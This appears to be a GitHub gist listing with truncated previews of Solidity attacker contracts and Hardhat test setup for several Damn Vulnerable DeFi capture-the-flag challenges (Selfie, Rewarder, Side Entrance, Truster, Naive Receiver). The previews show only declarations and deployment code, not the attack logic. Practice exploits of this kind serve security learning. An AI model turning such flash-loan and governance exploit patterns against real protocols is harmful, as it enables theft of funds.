0xAnon101
/ selfie.challenge.js
Created
October 27, 2022 02:14
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it("Exploit", async function () { | |
| const SelfieExploitFactory = await ethers.getContractFactory( | |
| "SelfieExploit", | |
| attacker | |
| ); | |
| this.selfieExploit = await SelfieExploitFactory.deploy( | |
| this.token.address, | |
| this.governance.address, | |
| this.pool.address | |
| ); |
0xAnon101
/ selfieExploit.sol
Created
October 26, 2022 12:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "hardhat/console.sol"; | |
| interface IDamnValuableToken { | |
| function approve(address spender, uint256 amount) external returns (bool); | |
| function transfer(address recipient, uint256 amount) | |
| external |
0xAnon101
/ rewardExploiter.sol
Created
October 23, 2022 21:09
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
| import "hardhat/console.sol"; | |
| contract RewarderExploit { | |
| address flashLoanPool; | |
| address rewarderPool; | |
| IERC20 public immutable liquidityToken; |
0xAnon101
/ sideentyether.js
Created
September 1, 2022 05:44
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it("Exploit", async function () { | |
| const SideEntranceExploitFactory = await ethers.getContractFactory( | |
| "SideEntranceExploit", | |
| attacker | |
| ); | |
| const SideEntranceExploit = await SideEntranceExploitFactory.deploy( | |
| this.pool.address | |
| ); | |
| await SideEntranceExploit.deployed(); |
0xAnon101
/ sideentryexploit.sol
Last active
September 1, 2022 05:25
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| interface IFlashLoanEtherReceiver { | |
| function execute() external payable; | |
| } | |
| interface ISideEntranceLenderPool { | |
| function deposit() external payable; | |
| function withdraw() external; |
0xAnon101
/ sideentry.sol
Last active
September 1, 2022 03:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pragma solidity ^0.8.0; | |
| interface IFlashLoanEtherReceiver { | |
| function execute() external payable; | |
| } | |
| contract SideEntranceLenderPool { | |
| // ... | |
| function deposit() external payable { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it("Exploit", async function () { | |
| const TrusterExploiterFactory = await ethers.getContractFactory( | |
| "TrusterExploiter", | |
| attacker | |
| ); | |
| const TrusterExploiter = await TrusterExploiterFactory.deploy( | |
| this.pool.address, | |
| this.token.address | |
| ); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
| contract TrusterExploiter { | |
| IERC20 public immutable damnValuableToken; | |
| address payable pool; | |
| uint256 public immutable MAX_INTEGER = 2**256 - 1; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it("Exploit", async function () { | |
| const naiveAttackerFactrory = await ethers.getContractFactory( | |
| "NaiveAttacker", | |
| attacker | |
| ); | |
| const naiveAttacker = await naiveAttackerFactrory.deploy(this.pool.address); | |
| // Attack | |
| console.log( |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "hardhat/console.sol"; | |
| contract NaiveAttacker { | |
| address pool; | |
| constructor(address payable _pool) { | |
| pool = _pool; | |
| } |
NewerOlder